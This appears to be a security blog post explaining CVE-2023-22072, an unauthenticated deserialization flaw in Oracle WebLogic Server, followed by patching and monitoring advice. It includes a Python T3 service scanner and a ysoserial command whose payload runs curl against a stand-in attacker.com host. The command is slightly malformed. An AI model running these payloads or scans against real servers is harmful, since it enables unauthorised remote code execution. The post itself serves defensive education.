CVE CyberSecurity Database News

CVE-2023-22072 - How Hackers are Taking Over Oracle WebLogic Server (12.2.1.3.) - A Deep Dive

Poster -

CVE-2023-22072 is a critical vulnerability found in Oracle WebLogic Server, specifically in version 12.2.1.3.. This flaw exists in the "Core" component of Oracle Fusion Middleware, and, alarmingly, it is classified as easily exploitable. An attacker doesn’t need credentials—just basic network access using the T3 or IIOP protocols is enough. If an attacker succeeds, they can take complete control of the WebLogic Server.

Severity:

CVSS 3.1 Base Score: 9.8 (Critical)

- Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Impact: Full loss of Confidentiality, Integrity, and Availability

In this post, I'll detail how CVE-2023-22072 works, how attackers can exploit it, and how to protect your servers. I’ll keep things clear and practical, with real code snippets and links for further reading.

What is the Vulnerability?

Oracle WebLogic Server supports T3 and IIOP protocols to exchange information between clients and the server. The problem here is that WebLogic processes certain network requests in a way that lets anyone on the network send special data to execute code on the server. The vulnerability does not require authentication, so even if your server is behind a firewall, it's at risk if T3/IIOP ports are accessible.

Unauthenticated attacker can send maliciously crafted data packets using T3 or IIOP.

- WebLogic fails to validate these objects correctly before processing, leading to _deserialization_ vulnerabilities.

Attack Demo (Simplified Steps)

Below is a Python-based example demonstrating the logic an attacker might use to check for this vulnerability. This is for educational and defensive purposes.

1. Port Scanning for T3 Service

WebLogic usually listens on port 7001 for T3 protocol.

import socket

def scan_weblogic_t3(ip, port=7001):
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        try:
            s.settimeout(3)
            s.connect((ip, port))
            # Send initial T3 handshake
            s.send(b't3 12.2.1.3.\nAS:255\nHL:19\nMS:10000000\n')
            response = s.recv(1024)
            if b'HELO' in response:
                print(f"WebLogic T3 protocol detected on {ip}:{port}")
        except Exception as e:
            print(f"Connection failed: {e}")

# Example usage
scan_weblogic_t3("192.168.1.100")

2. Sending Exploit Payload

Attackers typically use a Java-based exploit to send serialized objects that trigger code execution.

A common exploitation tool is ysoserial, which generates Java serialized objects for exploits.

Example command to generate a payload

java -jar ysoserial.jar CommonsCollections1 'curl http://attacker.com/pwned'; > payload.ser

Then, with a custom Java or Python client, the attacker would send payload.ser to the WebLogic server using the T3 protocol.

Critical: The above is a demonstration only; do not run malicious code on any system you do not own or have permission to test.

Exploit Tools

- ysoserial (Java deserialization tool)
- Custom T3 protocol exploiters (see public PoCs for earlier deserialization flaws, often modified for new problems)

Oracle Advisory:

Oracle Critical Patch Update Advisory - July 2023
- NVD CVE Record
- Oracle WebLogic Server Documentation

Apply Security Patches:

Oracle released a patch fixing this vulnerability as part of their July 2023 update. Upgrade to the latest version immediately.

Monitor Logs:

Watch your WebLogic logs for unusual activity, unexplained deserialization errors, or odd new processes.

Test Your Instance:

Use scanning tools like Nuclei with community templates for WebLogic to check for exposure.

Conclusion

CVE-2023-22072 is incredibly serious—don't wait to patch. An attacker can take over your WebLogic Server with a single, unauthenticated packet. Oracle WebLogic servers are a prime target due to their popularity in big organizations.

Block external access to risky ports, apply updates immediately, and consider regular security scans to ensure safety.

Stay safe, and always keep your software up-to-date!

*This post is for educational and defensive security purposes. For further technical details, always refer to the official Oracle documentation and advisories.*

Timeline

Published on: 10/17/2023 22:15:12 UTC
Last modified on: 10/23/2023 18:19:37 UTC